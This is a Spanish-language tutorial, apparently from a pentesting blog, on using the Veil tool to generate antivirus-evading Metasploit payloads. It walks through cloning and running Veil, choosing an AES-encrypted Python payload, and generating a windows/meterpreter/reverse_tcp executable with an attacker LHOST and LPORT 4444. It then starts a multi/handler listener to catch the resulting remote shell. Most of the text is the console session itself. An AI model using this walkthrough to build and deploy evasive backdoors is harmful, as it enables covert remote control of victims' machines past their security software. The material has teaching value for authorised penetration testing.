Veil – Evasión de Antivirus
Veil es una herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus. Utiliza métodos distintos para generar payloads diferentes y permite al usuario usar Pyinstaller o Py2Exe para convertir los payloads de Python a ejecutables.
Descarga Veil:
git clone https://github.com/ChrisTruncer/Veil cd Veil python Veil.py
root@stuxnet:/media/Stuxnet/Pentesting/veil# python Veil.py ========================================================================= Veil First Run Detected... Initializing Script Setup... ========================================================================= [*] Executing ./config/update.py... [>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf [*] OPERATING_SYSTEM = Linux [*] TERMINAL_CLEAR = clear [*] VEIL_PATH = /media/Stuxnet/Pentesting/veil/ [*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/ [*] Path '/root/veil-output/source/' Created [*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/ [*] Path '/ro ot/veil-output/compiled/' Created [*] TEMP_DIR = /tmp/ [*] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf [*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/ [*] MSFVENOM_OPTIONS = [*] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/settings.py ========================================================================= Veil | [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion ========================================================================= [!] WARNING: Official support for Kali Linux (x86) only at this time! [!] WARNING: Continue at your own risk! Main Menu 18 payloads loaded Available commands: use use a specific payload update update Veil to the latest version list list available languages/payloads info information on a specific payload exit exit Veil [>] Please enter a command: list ========================================================================= Veil | [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion ========================================================================= [!] WARNING: Official support for Kali Linux (x86) only at this time! [!] WARNING: Continue at your own risk! Available payloads: 1) c/VirtualAlloc Poor 2) c/VoidPointer Poor 3) c#/VirtualAlloc Poor 4) c#/b64SubVirtualAlloc Normal 5) native/BackdoorFactory Normal 6) native/hyperion Normal 7) native/pescrambler Normal 8) powershell/DownloadVirtualAlloc Excellent 9) powershell/PsexecVirtualAlloc Excellent 10) powershell/VirtualAlloc Excellent 11) python/AESEncrypted Excellent 12) python/ARCEncrypted Excellent 13) python/Base64Encode Excellent 14) python/DESEncrypted Excellent 15) python/FlatInjection Normal 16) python/LetterSubstitution Excellent 17) python/MeterHTTPContained Excellent 18) python/MeterHTTPSContained Excellent [>] Please enter a command: 11 ========================================================================= Veil | [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion ========================================================================= Payload: python/AESEncrypted loaded Required Options: Name Current Value Description ---- ------------- ----------- compile_to_exe Y Compile to an executable inject_method virtual [virtual]alloc or [void]pointer use_pyherion N Use the pyherion encrypter Available commands: set set a specific option value info show information about the payload help [crypters] show help menu for payload or crypters generate generate payload exit exit Veil back go to the main menu [>] Please enter a command: generate ========================================================================= Veil | [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion ========================================================================= [?] Use msfvenom or supply custom shellcode? 1 - msfvenom (default) 2 - Custom [>] Please enter the number of your choice: 1 [*] Press [enter] for windows/meterpreter/reverse_tcp [*] Press [tab] to list available payloads [>] Please enter metasploit payload: [>] Enter value for 'LHOST', [tab] for local IP: xxx.xxx.xxx.xxx [>] Enter value for 'LPORT': 4444 [>] Enter extra msfvenom options in OPTION=value syntax: [*] Generating shellcode... ========================================================================= Veil | [Version]: 2.1.0 ========================================================================= [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion ========================================================================= [*] Press [enter] for 'payload' [>] Please enter the base name for output files: [?] How would you like to create your payload executable? 1 - Pyinstaller (default) 2 - Py2Exe [>] Please enter the number of your choice: 1Seleccionamos la opción 1 y finalizamos. En este momento empieza a salir varios mensajes por consola mientras genera el ejecutable y finalmente, muestra un resumen de todo. En este se puede ver la ruta en la que ha dejado el resultado. Ahora abrimos Metasploit:
msf> use exploit/multi/handler msf exploit(handler) > exploit